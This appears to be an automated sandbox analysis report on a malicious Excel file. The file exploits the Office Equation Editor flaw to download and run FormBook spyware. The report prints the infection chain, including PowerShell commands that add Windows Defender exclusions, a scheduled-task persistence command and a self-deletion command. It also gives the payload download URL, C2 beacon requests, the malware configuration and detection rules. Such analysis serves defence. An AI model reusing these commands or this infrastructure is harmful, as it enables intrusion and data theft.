Loading ...

Play interactive tourEdit tour

Analysis Report Refno.191938.xlsx

Overview

General Information

Sample Name:Refno.191938.xlsx
Analysis ID:404009
MD5:a6ea0794f2791f9f2bdfcdb467122e6b
SHA1:83815a1977485c3fabdd49c91926d0482e3b78e1
SHA256:db692f9512b08149089a9d7295a04633f22944d87f2bfe53ae00d2c55f7502ca
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Non Interactive PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2580 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: BA01DF16E4C876E078348FD4479A8FDF)
      • powershell.exe (PID: 2884 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2924 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 2436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • powershell.exe (PID: 2920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • vbc.exe (PID: 1484 cmdline: C:\Users\Public\vbc.exe MD5: BA01DF16E4C876E078348FD4479A8FDF)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmmon32.exe (PID: 2376 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: EA7BAAB0792C846DE451001FAE0FBD5F)
            • cmd.exe (PID: 952 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x100da8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x101022:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x12d5c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x12d842:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x10cb45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x139365:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x10c631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x138e51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x10cc47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x139467:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x10cdbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x1395df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x101a3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12e25a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x10b8ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1380cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x102733:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x12ef53:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1129b7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x13f1d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1139ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        13.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        13.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        13.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          13.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.213.57, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2580, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2824, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe', ProcessId: 2884

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://198.23.213.57/ohms.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Refno.191938.xlsxVirustotal: Detection: 30%Perma Link
          Source: Refno.191938.xlsxReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exeJoe Sandbox ML: detected
          Source: 13.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbExplorer.Default -extoff source: powershell.exe, 00000005.00000002.2148838575.0000000000614000.00000004.00000020.sdmp
          Source: Binary string: System.Management.Automation.pdb:Z source: powershell.exe, 00000007.00000002.2161752463.000000000630D000.00000004.00000001.sdmp
          Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb< source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmmon32.exe
          Source: Binary string: System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb] source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2153198993.0000000002970000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: global trafficDNS query: name: www.20svip.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.213.57:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.213.57:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 3132 WEB-CLIENT PNG large image width download attempt 198.23.213.57:80 -> 192.168.2.22:49165
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.kelurahanpatikidul.xyz/op9s/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 14:40:50 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27Last-Modified: Tue, 04 May 2021 13:26:38 GMTETag: "b3600-5c18107215abc"Accept-Ranges: bytesContent-Length: 734720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f 96 32 da 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e8 0a 00 00 4c 00 00 00 00 00 00 d6 06 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 06 0b 00 4f 00 00 00 00 20 0b 00 2c 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 68 06 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc e6 0a 00 00 20 00 00 00 e8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 48 00 00 00 20 0b 00 00 4a 00 00 00 ea 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 06 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 8c f7 00 00 c4 1c 01 00 03 00 00 00 01 00 00 06 50 14 02 00 18 f2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 55 02 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
